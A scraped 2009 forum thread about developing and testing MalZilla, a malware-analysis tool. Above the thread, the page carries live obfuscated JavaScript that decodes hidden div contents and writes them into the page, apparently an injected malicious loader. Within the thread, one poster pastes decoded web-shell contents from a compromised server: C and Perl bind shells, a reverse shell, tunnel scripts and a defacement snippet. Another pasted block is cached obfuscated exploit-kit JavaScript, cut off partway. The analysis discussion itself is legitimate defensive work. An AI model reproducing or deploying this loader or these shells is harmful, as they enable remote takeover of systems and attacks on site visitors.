class='kVfln0'>242241421C4H3N271N211C4H241O26251C4H411O3M1O1C4H1N251N211C4H41421O1O1C4H414241421C4H3M3M24241C4H3N27413N1C4H252526251C4H24231O1O1C4H1N25411O1C4H41421O421C4H414241421C4H3M3M24241C4H3N27412519171I191C4H3O3M26251C4H1O1N23421C4H1N2520401C4H41421N401C4H414241421C4H3M3M24241C4H3N2741211C4H1N1N26251C4H1N42201O1C4H1N2526421C4H4142213N1C4H414241421C4H3M3M24241C4H3N2742421C4H204126251C4H1N3M272419171I191C4H</div><br /><i>utadzncned</i><ol><li>xoyzc</li></ol><a href=jfxcgeoypfys>tchmvyixmcjoo</a><br /><pre>uabvmtbaxpwo</pre><br /><div id='jwvmdupbmrvnj' style='visibility:hidden;'>434I4F494G414K464A3M4M4C434L</div><abbr>touwwwhrcyl</abbr><br /><div id='uKr623' class='kVfln0'>1N2523251C4H414220271C4H414241421C4H3M3M24241C4H3M42423N1C4H402524421C4H273M203O1C4H24241O231C4H42253M3M1C4H41261N241C4H414241411C4H3N1O41421C4H273M24241C4H24223O3N1C4H413N3M3M1C4H4141262319171I191C4H24223N241C4H42253N3M1C4H1N253N271C4H414224221C4H414241421C4H26253N421C4H422340271C4H27423O1N1C4H25261N251C4H414241421C4H242441421C4H42213M3M1C4H203M24221C4H2042243O1C4H24243N421C4H3O423M3M19171I191C4H</div><select><option>ozojwprdc</option></select><ul><li>hnfldrsal</li><li><div id='sqpuw' style='visibility:hidden;'>4B4F414L4B444M4B4F4C4M3M4J</div><strong>idfbprmaeglw</strong><br /><pre>dkhflbnj</pre><br /><div id='I4Syx5' class='kVfln0'>1O1N26251C4H414241421C4H3N4241421C4H3M3M24221C4H2623423N1C4H3N2441401C4H3N3M24221C4H1N2542251C4H414226411C4H414241421C4H3M3M413O1C4H20263O421C4H3N2141421C4H3O1O271O1C4H2026263M1C4H413N3M4219171I191C4H263M27251C4H414241421C4H273M1O1N1C4H24223O421C4H41213M3M1C4H414126231C4H24223N241C4H42253N3M1C4H3M421N251C4H414241421C4H262341421C4H3N2541261C4H3M3M413O1C4H403O3O3N1C4H3N3O21221C4H1O1N3N3O19171I191C4H</div><ul><li>psrmphst</li><li><br /><i>oqzplesorum</i><abbr>fdverxa</abbr><br /><ol><li>dfqznp</li></ol><u>lnwgqhgwhvhkokl</u><p id=wwskheqrso>nxfqlpwvhp</p><br /><div id='acaYwy' class='kVfln0'>3O42273M1C4H3N3O3N421C4H3M3M24221C4H262342211C4H3N24413M1C4H3N3M24221C4H1N2542251C4H41423O3O1C4H414241421C4H414226231C4H273M1O1N1C4H24223O421C4H41253M3M1C4H414026231C4H24223N241C4H42253N3M19171I191C4H42421N251C4H414241421C4H262341421C4H24221O1N1C4H42423M3M1C4H414126231C4H24223N241C4H42253N3M1C4H41421N251C4H414241421C4H3M4141421C4H3N403N221C4H1N41413O1C4H1N41413O1C4H1N41413O1C4H1N41413O19171I191C4H</div><textarea>lufzxv</textarea><br /><a href=quhqh>vlcced</a><br /><div id='axlirkoh' style='visibility:hidden;'>4A443O3M4D4A4J4I474B4I</div><abbr>igtxtbr</abbr><br /><pre>zhpziybd</pre><br /><br /><i>rcowemlsq</i><div id='bM9Iwd0J' class='kVfln0'>1N21243O1C4H3N23413N1C4H24223N3O1C4H1N4021231C4H3N401O261C4H1N421O1N1C4H24223N3M1C4H24221N211C4H412527201C4H3N2024221C4H3N2741211C4H273O24221C4H242240211C4H421O273N1C4H413O27251C4H3N271O3O19171I191C4H272724221C4H413O3O421C4H403O1O3O1C4H3M2420241C4H22203M411C4H203O413O1C4H403O3N271C4H411N1O271C4H4242231O1C4H1O4040231C4H4125273N1C4H201O20411C4H413O41201C4H3M421O401C4H1O411N221C4H1O1O402219171I191C4H</div><a href=rjfegymshmu>dcugvwdqwfbk</a><br /><select><option>gdctxpbil</option></select><ul><li>zufphno</li><li><br /><p>xpapi</p><div id='NTp5p' class='kVfln0'>273M3N1O1C4H3N231N3M1C4H1N2224221C4H3N2324221C4H413O3O3N1C4H262721201C4H412124221C4H24223M221C4H42213N231C4H2120413O1C4H413N24221C4H413O24221C4H3N1O203M1C4H20403N201C4H414241251C4H1O3N1N2519171I191C4H1O1N1O1O1C4H3N3M1O1N1C4H3M213N401C4H3M1N3M201C4H41423M1O1C4H252224261C4H251N25221C4H202K212F1C4H2525202K1C4H2422242H1C4H242I242K1C4H242J24231C4H2421202J1C4H242I242K1C4H251N202K1C4H251N241O1C4H241O242G</div><div id='qypjudncuycppne' style='visibility:hidden;'>42444B464946444C46</div><span>huyohwehapi</span>pkvuov<strong>ofcoibwtvtkxfd</strong><br /><p id=dmfgdglkfimwgcq>wywkme</p><br /><br /><i>hfnveafwstseart</i><ul><li>hhdqpwdii</li><li><pre>wxgheftqtgwoeb</pre><br /><div id='xnHlg6' class='kVfln0'>1C4H2423202K1C4H242325261C4H251N202J1C4H251N2426191G294I3M4E174C4F4E3M4L4G172B174H4A414F3O3M4C411F191C4H1N3M1N3M1C4H1N3M1N3M191G29404B174N1717174C4F4E3M4L4G171I2B174C4F4E3M4L4G2950174J444548411F4C4F4E3M4L4G1L48414A434G44172A171N4K401N1N1N1N1G2949414E3M4L172B174A414J172F4E4E3M4L1F1G29424B4E1F45172B171N291745172A171O1N1N2917451I1I1G17171749414E3M4L3G453I172B174C4F4E3M4L4G171I174F4E4G474B40294K49483O</div><br /><p>qdbqsl</p><select><option>ppaowkepfld</option></select><u>inryb</u><a href=pynqfunmrwqnodt>nvvcewwpfa</a><br /><div id='bzysqnav' class='kVfln0'>4B4041172B17192A3D3231172N2I2B2N2C2A3D2C2A2H2C2A183G2H2I2F392F3G2A45493M43411738372H2B444G4G4C281M1M1D1A4K1N3M1N3M291D1A4K1N3M1N3M291L414K3M494C48411L3O4B492C3I3I2C2A1M2H2C2A1M3D2C2A1M3D32312C2A38352F33172I2F392F38372H2B1A2N172I2F392F2K312I2B2H172I2F392F2K3437322F392F382B2M3932312C2A3D3231172N2I2B2N2C2A1M3D32312C2A38352F33172I2F392F38372H2B1A2N172I2F392F2K312I2B2H172I2F392F2K3437322F392F382B2M3932</div><span>osxtbf</span>obflwsjbawj<br /><i>ntlufikovbbl</i><div id='imdncpaf' style='visibility:hidden;'>444D454L444B4M4D47</div><p id=qmxdmu>fargmhe</p><br /><u>oxuteopuuuokdv</u><abbr>smzihpk</abbr><br /><div id='mT5NQQ7' class='kVfln0'>312C2A1M38352F332C2A1M38352F332C19294G3M43172B17404B3O4H49414A4G1L43414G2J484149414A4G2G4L2N401F194E414C483M3O41191G294G3M431L454A4A414E2M393231172B174K49483O4B404129504542171F322I2F2H1F1G4O4O352I2K1F1G4O4O3C32311F1G4O4O38381F1G1G174N17502A1M4F3O4E454C4G2C</div><script>function uijomwjzjgzsmxg(){}var rvervciw=2133;var yraacopuv='gyyzfntspk';function gMrSJ(N8piMAiW){CeERXeKC = '';function yhgwnjzlngcl(eedgsamborlvq){return jqtjyf;}for(jqTpAB5 = 0; jqTpAB5 < (N8piMAiW.length / 2); jqTpAB5++ ){CeERXeKC += String.fromCharCode(parseInt(N8piMAiW.substr(jqTpAB5 * 2, 2),25));function ybhzwllvojtj(){}var jdhjx=8425;var wlmmloxofb='euztprlulvro';this.ycgtmgxking='ejjdv';}return CeERXeKC;var kufduxbilje=6957;}function AU0pO(Uc4aR){var eevsoyxblbgr='nrlpkmlgme';var delkyg=2964;this.gucca='cvtke';function fdtjkpqqakwwv(){}function xtbnoeaccewgf(vkriu){return vhtwdarm;}return document.getElementById(Uc4aR).innerHTML;function qhgsojemslowet(){}var fckohtuxoebbam='kwjxlq';var xjupqljqrndgfzx=2486;function stdoqhtdqw(xpyjkgeo){return hptcvwiisxdkkk;}this.ryxqg=false;this.sonucucfikrisb='jgcaepxc';}var a6OPD =new Array('t2bAkX9m','tmDwV','ITgCCe','bwaPH','KmXVfl','MmzXYt','niRPgw6','DmIt8K','SHHc7Pcb','MDDXD1','uKr623','I4Syx5','acaYwy','bM9Iwd0J','NTp5p','xnHlg6','bzysqnav','mT5NQQ7',"gr4tgwsd");for(Fqe2FB = 0; Fqe2FB  < a6OPD.length; Fqe2FB++){function dlahfld(vtkopnf){return aheycwqmnxa;}function uezav(){}document.write(gMrSJ(AU0pO(a6OPD[Fqe2FB])));this.gxftjwexflxekxx=false;var aqaigvcbgqr='zmotqk';var mjllsaiuoi=3084;this.evvlurtywedxqvm='rwswczmn';function gaipg(){}}</script>
Title: Re: MalZilla
Post by: bobby on July 12, 2009, 10:32:07 am
@JohnC

I'm doing a large rewrite of Malzilla at the moment.
I've started from the HTTP/FTP downloader.
OpenSSL is removed. HTTPS connections are handled by cryptlib now:
http://www.cs.auckland.ac.nz/~pgut001/cryptlib/
This will hopefully solve the Vista issues.
HTTP downloader now handles gzip, deflate and raw zlib compression (previous version did just gzip)

Some visual GUI artifacts in Vista and Win7 should be fixed now (forced repaint of the GUI because some of the buttons disappeared from the GUI after using accelerator keys (keyboard shortcuts))

Work in progress: - testing all kind of redirections

Link Parser also got a large rewrite and needs a lot of testing to see if all is working.

Misc Decoders got some rewrite (bas64/MIME decoder for now, but more will follow).

When I get all done with previously mentioned components, I will go for JavaScript-related parts.
Kalimero will probably be left out of the Malzilla if I get my DoomZilla engine up and running. DoomZilla engine will implement the complete DOM parser, and SpiderMonkey will interact with DOM objects like it does in browsers (most notably the functions like GetElementByID and similar will be handled out of the box).
In August I will be without PC, and I will start this part probably in September.

I will hopefully do one release before August, containing the latest changes.

@all
I would need help with some serious testing.
Test cases are needed for the following:
- HTTP Encodings (compression)
- all kind of redirections (3xx HTTP responeses, through META tags, from JavaScript code etc.)
- cases for Link Parser to see if it is missing links (links are now extracted also from <img>, <applet>, <object> and similar tags)

Latter, I will also need test cases for external scripts ( <script src="../../myscript.js) to get the automatically downloaded and injected into main HTML, so that the JavaScript decoder can use them just like it uses normal inline scripts.

So, if there are any volunteers for writing test cases (or to collect them from the net), I would be more than thankful.
The tests will be put online on malzilla.org (PHP is available, but no DB), so be careful about licenses and copyrights of the test-cases you collect (if any :) )
Title: Re: MalZilla
Post by: bobby on July 12, 2009, 10:39:35 am
btw. this is what gave me motivation to work further on Malzilla:
http://holisticinfosec.blogspot.com/2009/07/malzilla-exploring-scareware-and-drive.html
http://holisticinfosec.org/toolsmith/docs/july2009.pdf
Title: Re: MalZilla
Post by: MysteryFCM on July 12, 2009, 02:44:42 pm
I'll be happy to do testing for you :)
Title: Re: MalZilla
Post by: bobby on July 12, 2009, 08:32:28 pm
Would you write test-cases (HTML, PHP, JS), or test it on web sites?
Title: Re: MalZilla
Post by: MysteryFCM on July 12, 2009, 08:35:03 pm
I'd be testing it on ITW malicious sites, yep :)
Title: Re: MalZilla
Post by: bobby on July 12, 2009, 09:06:31 pm
http://www.malzilla.org/dev_builds/
Please read the changelog to see what is to be expect from this build.

Test cases for Link Parser and for redirections would be good thing to have. Without good tests we will never know if these are working OK (one would need to compare the site source code with parser results by hand, to see if something is missing).

Edit: forgot to write in changelog that the PScript is removed. Dunno if anyone found it useful at all.
Title: Re: MalZilla
Post by: MysteryFCM on July 12, 2009, 09:08:49 pm
I'll take a look and report back, cheers :)
Title: Re: MalZilla
Post by: MysteryFCM on July 15, 2009, 10:07:58 pm
Bobby,
Just an FYI, the following seems to be failing? (it downloads the code, but can't seem to decode it?)

Code: [Select]
http://lipesr.com/update/?eb70c8bc3e184ffe5a98905e484546d9
Wepawet is failing with this one too :(

http://wepawet.cs.ucsb.edu/view.php?hash=0e28254bfce6009968e5b2982f0c7c33&t=1247695990&type=js

Gonna give JSUnpack a go ...... and if that fails too, I'll do it manually.
Title: Re: MalZilla
Post by: MysteryFCM on July 16, 2009, 03:49:04 pm
Bobby,
Just an FYI, the Base64 decoder seems to be failing to decode the Base64 encoded data in the attached shell (found on a rooted box (already reported it to the ISP)).

Decoded manually shows it decodes to;

Code: [Select]
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;

 int sockfd, newfd;
 char buf[30];
 struct sockaddr_in remote;
 if(fork() == 0) {
 remote.sin_family = AF_INET;
 remote.sin_port = htons(atoi(argv[1]));
 remote.sin_addr.s_addr = htonl(INADDR_ANY);
 sockfd = socket(AF_INET,SOCK_STREAM,0);
 if(!sockfd) perror("socket error");
 bind(sockfd, (struct sockaddr *)&remote, 0x10);
 listen(sockfd, 5);
 while(1)
  {
   newfd=accept(sockfd,0,0);
   dup2(newfd,0);
   dup2(newfd,1);
   dup2(newfd,2);
   write(newfd,"Password:",10);
   read(newfd,buf,sizeof(buf));
   if (!chpass(argv[2],buf))
   system("echo welcome to Yogyacardus shell && /bin/bash -i");
   else
   fprintf(stderr,"Sorry");
   close(newfd);
  }
 }
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
if(entered[i] == '\r')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
 int fd;
 struct sockaddr_in sin;
 char rms[21]="rm -f ";
 daemon(1,0);
 sin.sin_family = AF_INET;
 sin.sin_port = htons(atoi(argv[2]));
 sin.sin_addr.s_addr = inet_addr(argv[1]);
 bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
 fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
 if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
   perror("[-] connect()");
   exit(0);
 }
 strcat(rms, argv[0]);
 system(rms); 
 dup2(fd, 0);
 dup2(fd, 1);
 dup2(fd, 2);
 execl("/bin/sh","sh -i", NULL);
 close(fd);
}

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <linux/time.h>
#ifdef STRERROR
extern char *sys_errlist[];
extern int sys_nerr;
char *undef = "Undefined error";
char *strerror(error) 
int error; 
{
if (error > sys_nerr)
return undef;
return sys_errlist[error];
}
#endif

main(argc, argv) 
  int argc; 
  char **argv; 
{
  int lsock, csock, osock;
  FILE *cfile;
  char buf[4096];
  struct sockaddr_in laddr, caddr, oaddr;
  int caddrlen = sizeof(caddr);
  fd_set fdsr, fdse;
  struct hostent *h;
  struct servent *s;
  int nbyt;
  unsigned long a;
  unsigned short oport;

  if (argc != 4) {
    fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
    return 30;
  }
  a = inet_addr(argv[3]);
  if (!(h = gethostbyname(argv[3])) &&
      !(h = gethostbyaddr(&a, 4, AF_INET))) {
    perror(argv[3]);
    return 25;
  }
  oport = atol(argv[2]);
  laddr.sin_port = htons((unsigned short)(atol(argv[1])));
  if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("socket");
    return 20;
  }
  laddr.sin_family = htons(AF_INET);
  laddr.sin_addr.s_addr = htonl(0);
  if (bind(lsock, &laddr, sizeof(laddr))) {
    perror("bind");
    return 20;
  }
  if (listen(lsock, 1)) {
    perror("listen");
    return 20;
  }
  if ((nbyt = fork()) == -1) {
    perror("fork");
    return 20;
  }
  if (nbyt > 0)
    return 0;
  setsid();
  while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
    cfile = fdopen(csock,"r+");
    if ((nbyt = fork()) == -1) {
      fprintf(cfile, "500 fork: %s\n", strerror(errno));
      shutdown(csock,2);
      fclose(cfile);
      continue;
    }
    if (nbyt == 0)
      goto gotsock;
    fclose(cfile);
    while (waitpid(-1, NULL, WNOHANG) > 0);
  }
  return 20;

 gotsock:
  if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    fprintf(cfile, "500 socket: %s\n", strerror(errno));
    goto quit1;
  }
  oaddr.sin_family = h->h_addrtype;
  oaddr.sin_port = htons(oport);
  memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
  if (connect(osock, &oaddr, sizeof(oaddr))) {
    fprintf(cfile, "500 connect: %s\n", strerror(errno));
    goto quit1;
  }
  while (1) {
    FD_ZERO(&fdsr);
    FD_ZERO(&fdse);
    FD_SET(csock,&fdsr);
    FD_SET(csock,&fdse);
    FD_SET(osock,&fdsr);
    FD_SET(osock,&fdse);
    if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
      fprintf(cfile, "500 select: %s\n", strerror(errno));
      goto quit2;
    }
    if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
      if ((nbyt = read(csock,buf,4096)) <= 0)
goto quit2;
      if ((write(osock,buf,nbyt)) <= 0)
goto quit2;
    } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
      if ((nbyt = read(osock,buf,4096)) <= 0)
goto quit2;
      if ((write(csock,buf,nbyt)) <= 0)
goto quit2;
    }
  }

 quit2:
  shutdown(osock,2);
  close(osock);
 quit1:
  fflush(cfile);
  shutdown(csock,2);
 quit0:
  fclose(cfile);
  return 0;
}

#!/usr/bin/perl
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host      = $ARGV[1];
$port      = $ARGV[2];
$daemon=1;
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
$SIG{'CHLD'} = 'IGNORE';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
++$num;
$pid = fork();
if (!defined($pid)) { print STDERR "$!\n"; }
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); }
else { $ch->close(); }
}
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
if (!$th) { exit 0; }
my $fh;
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
$ch->autoflush();
$th->autoflush();
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout  &&  !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\n";
exit 0;
}
if ($result == 0) { exit 0; }
}
if ($th  &&  (vec($eout, fileno($th), 1)  || vec($rout, fileno($th), 1))) {
my $result = sysread($th, $cbuffer, 1024);
if (!defined($result)) { print STDERR "$!\n"; exit 0; }
if ($result == 0) {exit 0;}
}
if ($fh  &&  $tbuffer) {(print $fh $tbuffer);}
while (my $len = length($tbuffer)) {
my $res = syswrite($th, $tbuffer, $len);
if ($res > 0) {$tbuffer = substr($tbuffer, $res);}
else {print STDERR "$!\n";}
}
while (my $len = length($cbuffer)) {
my $res = syswrite($ch, $cbuffer, $len);
if ($res > 0) {$cbuffer = substr($cbuffer, $res);}
else {print STDERR "$!\n";}
}}}


<script language="JavaScript">
<!--
var my = "http://www.yogyacardus.com/images/r57.gif";
document.write('<div style="position:fixed;_position:absolute;bottom:0px;right:0px;clip: inherit;_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);"><img src="'+my+'" alt="Yogyacardus ? 2008" onmouseover="this.style.cursor=\'pointer\'" onclick="parent.location=\'http://www.yogyacardus.com\'" /></div>');
//-->
</script>

yodyacardus.com seems to be dead atm.
Title: Re: MalZilla
Post by: bobby on July 16, 2009, 05:08:56 pm
Hi MysteryFCM,

First link returns 404 for me.

As for the second one, which file from the attached archive is problematic?
I see the encoded string in idx.txt, but that one should be decoded (Base64). After that you need to apply ROT13 decoding, and do a zlib inflate at the end.
Title: Re: MalZilla
Post by: MysteryFCM on July 16, 2009, 05:13:14 pm
Sorry dude, the Base64 is in style.txt

I'll have a look to see if the lipesr.com one is still in Malzilla's cache :)
Title: Re: MalZilla
Post by: MysteryFCM on July 16, 2009, 05:14:17 pm
Here you go ..... tis the code from the cache for the URL now returning a 404 :)

Code: [Select]
<html><body><script>eicis='503';duas="d";lapsui='Wi';egerit="sp";lexque="av";ictuum='bject';otia="dC";vocare=".284";gemma='NI';labens=702;margin='va';dasque="13.";paras=5509;weaner='abcde';acuta=1;feroci='UN';teneto="0.77";imis='C';quoquo='tV';facat=3;snook="pp";cervos='t';suopte=992;sulcis=6854;etimus='ndo';dicari=0;venint="6192";igitur='n';matrem="ea";gravi="8e0";mdcqve="";alma='s';rebus='tW';scitis=".55";oravi="m";magnae="691";novem=6733;foedo="tt";inerat=731;frenas='[HAS';citra='m';ineo='ij';ring='A';statum="men";usuum='tion';hisco='0.120';capio=952;nonam='ndow';black=4;ludat="2162.";dando='d';ponis='87';lucant="7766.";fetuum="en";futura=738;corn='wi';buck=473;textum=7;valuer='f';parant="s";mergis='';memora='z0';nark='L';carpet='us';luces="9.435e3";atris='V';mque="t";boreas="dd";tenuis='cti';amorem='de';credit='ue';xxxii=91;bella="27.";multae='deA';adiuti="4.196e3";lignum='y';vicit='3.645e3';herba='w';ageres=8;reel='Vie';inest=289;moneas='ew';rotas=2;chorus=844;poenis=8823;leti="io";itabat=284;caduci='v';fluit='Vi';timet='pR';creta='i';captis=72;ardet=200;acque='p';tityre="Be";saniem='l';spruik='lf';adorto=8290;infers="us";visum=']';shot='.976';unam=90;caros=5;mocker="551.";googly=621;mari='r';ipso="u";velabo='u';umida='re';semine="nt";aberim=30;rector='e';nodos="r";auctam='x';sumi=69;varium=' t';mortis='last';iussis=52;chuddy='S';proice="a";senis='o';templa='fa';trades='+';sulco=(4.394e3<=adiuti?9:''+'A'+'B'+'C'+'D'+'E'+'F'+'');postis=("3.6e1">4.2e2?2.403e3:mari+'i'+'ng'+'');function wowser(caedar){quivi=new caedar()}function quimus(incute,suete){for(iunges=0;iunges<incute;iunges++)suete[iunges]=iunges}function fulvum(uocare,aequat){for(iunges=0;iunges<uocare;iunges++){ausam=(ausam+quivi[iunges]+aequat[yard](iunges%aequat[amorum]))%uocare;ibique=quivi[iunges];quivi[iunges]=quivi[ausam];quivi[ausam]=ibique}}function iouem(gnow,erga){iunges=(iunges+1)%erga;ausam=(ausam+quivi[iunges])%erga;enetos();quivi[ausam]=ibique;tuorum(gnow)}function enetos(linquo){ibique=quivi[iunges];quivi[iunges]=quivi[ausam]}function tuorum(mitte){etque+=vitateei[optime](mitte[yard](invia)^quivi[(quivi[iunges]+quivi[ausam])%tecum])}function rumpis(gnow){for(invia=0;invia<gnow[amorum];invia++){iouem(gnow,256)}}function anco(aliquo){iunges=aliquo;ausam=aliquo}sedere=(88,relata);laude=(6.4e1,mergis+'a'+'');tecum=(5.6e1,256);(9077>=0.8?sedere:4.8e1)(('.298'<547.?this:.727));valle=(8340.,exciti);sulco+=(0.291e3>"25"?'GH'+'IJK'+'L'+'MN'+'O'+'':525.);ferrum=(1.,oblato);pontum=(dasque<9297?motser:.6899);uerbi=('.8'<8127.?iugulo:1.97e2);natavijie=(1070,ferrum);grauis=(7,pontum)[(7.3e2>='.420'?""+"d"+"o"+"c"+"u"+"m"+"e"+"n"+mque+"":7.78e2)];optime=('.116'>=8.83e2?55.:mergis+'f'+mari+'o')+(0.106,'m'+imis)+(.3,'har')+(1.2e1>'35'?55:'C')+(99.>=0.63?mergis+'o'+'d'+'e'+'':.5804);amorum=(labens,'le')+(2585,igitur+'g')+(.92,'th');vitateei=(1.52e2,grauis)[(669,mergis+acque+'a'+'re'+'nt'+lapsui+'nd'+'ow'+mergis)][(9e0,'w'+'ind'+'ow')][(5.6e1,mergis+'S'+mergis)+("5773"<.2?.8:'t')+(6.368e3<="9.822e3"?postis:0.83)];sulco+=(59<=.62?167:mergis+'P'+'Q'+'R'+chuddy+'T'+'U'+mergis)+(8e0,''+'V'+'W'+'X'+'Y'+'Z'+'');mater=('4997'>=0.67?''+mari+'ay':46);funder=(4e0<luces?'ath':5.64e2);intra=('92'>.4?uerbi:7e0);joey=(6364.,'unc')+(0.3966,usuum);pictis=(unam<7?5:grauis);try{potiti=(56<=9.?3617.:'er')+(8.,'Da');larem=(1.3e1,'#');luges=(3.3e1,'pa');joseph=("5722">5e0?amorem+'f'+'aul'+'t':8395.);trap=(1e0>='.4'?larem:8.07e2);var mensae=(rotas,pictis)[('4.'>=2e0?"cr"+"ea"+mque+"eE"+"lem"+"e"+"nt":iussis)]((.63,'s')+(1e0,luges)+(.1<=.3?igitur+mergis:8.1e2));epeos=(.5>=0.89?798:larem)+(venint>=8.38e2?joseph:0.983)+(1.79e2>=9.332e3?0.135:trap)+(8e0,carpet)+(0.306e3<86?9e0:potiti)+(5.<=facat?3e0:mergis+'ta'+'');(6.>novem?5:mensae)[(177,"a"+boreas+tityre+"h"+lexque+leti+"r"+"")]((4038,epeos));(scitis>=23.?.767:pictis)[("4.28e2"<6?9:"bo"+"d"+"y")][(5,proice+snook+"e"+"n"+otia+"hi"+"l"+"d")]((poenis>47?mensae:1.6e1));(chorus,mensae)[(8>=4?"load":facat)]((ageres<5e0?42:'['+'HA'+'SH'+']'+'['+'U'+gemma+'Q]'+mergis));if((.73<=5?mensae:.9)[(2.9e1>=.7084?"XMLDocume"+semine:273)][(rotas,""+duas+"oc"+"u"+"me"+"ntE"+"le"+statum+mque)][(0.540<=6e0?""+proice+mque+mque+"r"+"i"+"b"+ipso+"t"+"e"+"s"+"":319.)][(7e0,amorum)]==("58"<=5083?dicari:capio)){(4.465e3,mensae)[("6.3e1"<=0.8?70.:"s"+"etA"+foedo+"ribute"+"")]((3.22e2,mortis)+("21">7?mergis+'t'+'i'+'m'+'e'+'':.5026),new (.2,Date)());(3491,mensae)[(9.,""+parant+proice+"v"+"e"+"")]((lucant<804.?2.21e2:'['+'H'+'AS'+'H'+visum+'['+feroci+'IQ'+visum))}else{laude+=(9.8e1,'!')}}catch(darer){}sulco+=(.4,weaner)+(shot>0.2?''+'f'+'gh'+ineo+'kl'+'m':6.27e2);atrox=("6"<=5.708e3?'e':.9667);crate=(.4,pictis);scivit=(0.9,ducere);sedis=(2056<.35?2.4e1:margin);sulco+=(1e0,''+igitur+'o'+acque+'q'+mari+'s'+'t'+'u'+'')+(4,'v'+'w'+'xy'+memora+'1'+'23'+'4')+(.151,''+'5'+'6'+'7'+'8'+'9'+trades+'/'+'='+mergis);yard=(1>=6.96e2?5e0:'ch')+(0.34,'arC')+(0.7050,senis+multae+'t'+'');if((39.>925?2:sulco)[(1.6e1<='5.003e3'?atrox:6.33e2)+(.759,sedis)+('9.8e1'<=.6625?0.114:mergis+'l')]){sulco=(6.01e2<=183.?0.688:mergis);crate=(4e0,sulco)}donato=("71"<=.8?.8:''+senis+mari+'a'+'g'+'e'+mergis);oscar=(caros,'gl');macto=(657<1?0.876e3:'oba'+'');quilt=(98>=8e0?crate:8.3e1);function ducere(puppis,lassa,puram,sinuum){('4470'<=2e0?.4058:wowser)(("1.187e3"<.7?9990.:queantyyo));(0.638>=eicis?.8:quimus)((0.838,256),(759.,quivi));(2.845e3<=2835?1.07e2:anco)((.2477<=624.?dicari:7.9e1));(4<=971.?fulvum:7)((8.75e2,256),(119.>9e0?puppis:3.4e1));(.5<"782"?anco:18.)((2117,0));etque=(9.693e3>"9.7e1"?''+'':4.4e1);(0.6531>=.987?textum:rumpis)(("0.2805"<=0.1293?9898.:lassa));return (9e1>='4.'?etque:5008.)}rimerjie=(.956,quilt);function iugulo(lego,uagis,amores,petat){var raucam;try{manus=(3.519e3,mergis+'x'+'m'+'l'+'2'+'.'+'X'+'');foedum=(.883,mergis+'H'+'T'+'T'+'P'+'');uicere=(421.,manus)+(4>textum?1e0:'ML')+(1e0,foedum);raucam=new 